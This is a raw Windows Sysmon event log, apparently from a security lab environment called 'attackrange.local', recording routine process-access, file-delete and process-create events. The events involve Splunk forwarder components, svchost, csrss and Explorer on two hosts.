23542300x8000000000000000806685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F5298DAA0A6D72EA0DE4643091A077C,SHA256=E15F73B0CB796546A71B89FC0B283617F58142093E995E4E04EE467A2D9DD773,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.285{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.519{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:27.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FBA1EB4BF1F308FD281924D535D6E0,SHA256=F474FDA0AEB6023B96A4E5254894C50224E2A0C314940FC34B998AFF60AAD5B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.815{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F1E3AC8F35C2E139BB77252538C303D,SHA256=D179FF0295A2EBDB85651B7B83DEC3F353D72835A6FE9FE1354C6F9D25095153,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.612{0C1E0330-F38F-60EB-5579-00000000D001}25642984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 